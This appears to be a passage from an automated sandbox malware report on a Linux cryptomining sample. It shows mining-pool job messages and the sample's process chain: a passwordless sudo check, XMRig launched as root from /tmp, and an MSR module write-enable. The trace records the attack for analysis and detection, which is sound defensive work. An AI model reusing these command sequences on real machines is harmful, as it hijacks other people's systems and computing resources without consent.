                                  2024-09-18 06:17:55 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 32 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 65 31 37 38 66 65 64 36 31 62 31 31 63 35 35 39 34 39 32 65 66 36 39 33 64 34 33 31 34 30 65 65 64 35 32 34 66 62 36 30 38 65 35 33 36 64 35 30 64 36 65 33 30 37 62 38 62 34 63 37 35 37 66 34 31 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6d 4c 6f 55 4d 31 64 56 53 43 4a 77 50 69 79 6a 67 42 6f 37 30 74 4d 45 48 74 49 41 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101092e1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf00000000e178fed61b11c559492ef693d43140eed524fb608e536d50d6e307b8b4c757f411","job_id":"mLoUM1dVSCJwPiyjgBo70tMEHtIA","target":"8
                                  2024-09-18 06:18:05 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 64 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 65 35 66 35 37 38 30 62 33 61 61 35 34 64 62 64 35 64 32 32 37 30 36 61 64 32 39 34 34 39 35 30 34 37 31 38 35 30 66 34 32 61 30 31 32 62 38 36 32 39 32 39 63 65 65 36 37 35 36 63 31 63 35 33 31 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 48 33 63 35 49 74 6f 39 31 53 59 2b 38 43 5a 75 77 52 47 5a 66 47 6c 67 55 45 4d 4c 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109de1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf00000000e5f5780b3aa54dbd5d22706ad2944950471850f42a012b862929cee6756c1c5315","job_id":"H3c5Ito91SY+8CZuwRGZfGlgUEML","target":"8
                                  2024-09-18 06:18:15 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 37 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 34 39 64 38 32 37 66 32 37 66 34 38 65 37 32 37 64 37 38 63 38 63 35 35 62 65 62 36 36 66 62 62 34 33 62 63 32 38 35 62 32 32 35 61 39 66 64 31 30 32 39 62 66 35 37 39 30 32 36 39 63 39 32 34 31 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6f 72 66 38 63 67 4e 53 62 36 7a 6f 72 31 68 38 73 57 45 77 32 39 74 45 64 76 72 52 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a7e1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf0000000049d827f27f48e727d78c8c55beb66fbb43bc285b225a9fd1029bf5790269c92417","job_id":"orf8cgNSb6zor1h8sWEw29tEdvrR","target":"8
                                  2024-09-18 06:18:25 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 31 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 38 32 32 33 62 33 64 62 33 36 36 61 36 34 63 32 39 33 34 64 33 62 66 63 62 39 32 39 61 38 39 37 38 37 38 36 33 34 30 36 30 30 39 30 31 33 36 34 62 33 35 35 66 34 65 63 30 31 36 35 32 63 37 61 31 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 77 55 4c 45 75 70 52 37 43 78 47 56 51 46 72 48 44 47 79 68 6f 46 49 72 58 31 64 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b1e1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf000000008223b3db366a64c2934d3bfcb929a8978786340600901364b355f4ec01652c7a1d","job_id":"fwULEupR7CxGVQFrHDGyhoFIrX1d","target":"8
                                  2024-09-18 06:18:35 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 65 31 61 39 62 37 30 36 30 61 30 36 66 63 34 32 34 37 64 39 63 38 30 64 66 65 31 36 32 37 62 38 65 30 65 37 39 63 32 65 38 66 38 64 64 65 33 38 63 65 37 36 34 64 36 38 33 34 32 63 62 34 36 38 63 61 65 66 32 66 62 66 30 30 30 30 30 30 30 30 63 33 30 37 31 63 32 35 31 36 35 37 62 38 39 30 62 38 34 38 62 65 38 39 62 33 35 61 38 34 62 31 63 62 61 37 39 63 37 38 66 31 33 38 34 31 36 66 30 62 61 37 33 33 39 36 35 65 62 30 63 34 30 35 32 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 78 33 5a 6c 7a 33 43 58 5a 35 44 6d 46 72 68 4b 67 6d 51 6a 38 46 61 41 73 36 5a 64 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bbe1a9b7060a06fc4247d9c80dfe1627b8e0e79c2e8f8dde38ce764d68342cb468caef2fbf00000000c3071c251657b890b848be89b35a84b1cba79c78f138416f0ba733965eb0c40525","job_id":"x3Zlz3CXZ5DmFrhKgmQj8FaAs6Zd","target":"8
                                  2024-09-18 06:18:42 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 32 65 31 61 39 62 37 30 36 39 35 65 34 39 32 63 37 38 34 65 62 64 33 32 31 32 38 62 62 38 65 38 66 33 62 31 64 61 31 32 62 65 61 35 34 64 32 35 64 62 33 61 32 39 39 31 30 38 64 32 35 30 31 62 38 61 33 63 63 32 35 66 33 30 30 30 30 30 30 30 30 34 62 32 64 64 66 36 32 61 62 34 32 30 31 30 65 66 64 33 31 37 33 61 61 32 65 61 36 31 31 31 62 39 30 37 35 39 32 39 39 36 61 36 63 34 32 37 34 61 34 32 35 39 37 64 66 36 61 37 62 63 34 34 65 30 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6f 4e 77 73 79 49 2f 56 52 4f 59 4e 32 34 45 44 32 4e 6a 2b 70 32 4e 70 67 39 7a 45 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c2e1a9b70695e492c784ebd32128bb8e8f3b1da12bea54d25db3a299108d2501b8a3cc25f3000000004b2ddf62ab42010efd3173aa2ea6111b907592996a6c4274a42597df6a7bc44e08","job_id":"oNwsyI/VROYN24ED2Nj+p2Npg9zE","target":"8
                                  2024-09-18 06:18:52 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 63 65 31 61 39 62 37 30 36 39 35 65 34 39 32 63 37 38 34 65 62 64 33 32 31 32 38 62 62 38 65 38 66 33 62 31 64 61 31 32 62 65 61 35 34 64 32 35 64 62 33 61 32 39 39 31 30 38 64 32 35 30 31 62 38 61 33 63 63 32 35 66 33 30 30 30 30 30 30 30 30 32 30 64 64 65 62 32 38 64 61 65 35 38 37 36 31 34 35 36 38 63 34 34 39 38 30 37 36 37 65 65 62 36 30 35 30 61 33 33 64 38 31 66 33 35 63 61 36 33 39 31 39 36 33 34 30 36 61 34 36 62 35 38 30 30 62 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 41 5a 73 43 38 36 4b 34 64 57 2f 78 37 74 35 48 61 44 35 56 46 68 4a 67 45 4b 75 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cce1a9b70695e492c784ebd32128bb8e8f3b1da12bea54d25db3a299108d2501b8a3cc25f30000000020ddeb28dae587614568c44980767eeb6050a33d81f35ca6391963406a46b5800b","job_id":"5AZsC86K4dW/x7t5HaD5VFhJgEKu","target":"8


                                  System Behavior

                                  General

                                  Start time (UTC):06:16:54
                                  Start date (UTC):18/09/2024
                                  Path:/tmp/xmr_linux_amd64.elf
                                  Arguments:/tmp/xmr_linux_amd64.elf
                                  File size:9076871 bytes
                                  MD5 hash:aff9d4675fdb21bb30e23ab1466b5841

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:06
                                  Start date (UTC):18/09/2024
                                  Path:/tmp/xmr_linux_amd64.elf
                                  Arguments:-
                                  File size:9076871 bytes
                                  MD5 hash:aff9d4675fdb21bb30e23ab1466b5841

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:06
                                  Start date (UTC):18/09/2024
                                  Path:/usr/bin/sudo
                                  Arguments:sudo -n true
                                  File size:166056 bytes
                                  MD5 hash:eb8c10001fe28b9c4c2e42b96347f6db

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:06
                                  Start date (UTC):18/09/2024
                                  Path:/usr/bin/sudo
                                  Arguments:-
                                  File size:166056 bytes
                                  MD5 hash:eb8c10001fe28b9c4c2e42b96347f6db

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:06
                                  Start date (UTC):18/09/2024
                                  Path:/usr/bin/true
                                  Arguments:true
                                  File size:39256 bytes
                                  MD5 hash:589a58ff455dbd092cb3ba3dd2c4c63e

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:15
                                  Start date (UTC):18/09/2024
                                  Path:/tmp/xmr_linux_amd64.elf
                                  Arguments:-
                                  File size:9076871 bytes
                                  MD5 hash:aff9d4675fdb21bb30e23ab1466b5841

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:15
                                  Start date (UTC):18/09/2024
                                  Path:/usr/bin/sudo
                                  Arguments:sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig
                                  File size:166056 bytes
                                  MD5 hash:eb8c10001fe28b9c4c2e42b96347f6db

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:16
                                  Start date (UTC):18/09/2024
                                  Path:/usr/bin/sudo
                                  Arguments:-
                                  File size:166056 bytes
                                  MD5 hash:eb8c10001fe28b9c4c2e42b96347f6db

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:16
                                  Start date (UTC):18/09/2024
                                  Path:/tmp/xmrig/xmrig-6.21.3/xmrig
                                  Arguments:/tmp/xmrig/xmrig-6.21.3/xmrig
                                  File size:8285424 bytes
                                  MD5 hash:7429d24207b100f6c164bf4703b5941e

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:43
                                  Start date (UTC):18/09/2024
                                  Path:/tmp/xmrig/xmrig-6.21.3/xmrig
                                  Arguments:-
                                  File size:8285424 bytes
                                  MD5 hash:7429d24207b100f6c164bf4703b5941e

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:43
                                  Start date (UTC):18/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:43
                                  Start date (UTC):18/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):06:17:43
                                  Start date (UTC):18/09/2024
                                  Path:/sbin/modprobe
                                  Arguments:/sbin/modprobe msr allow_writes=on
                                  File size:174424 bytes
                                  MD5 hash:0b44462b1a40df8039d6d61cfff7ea84

                                  Chronological Activities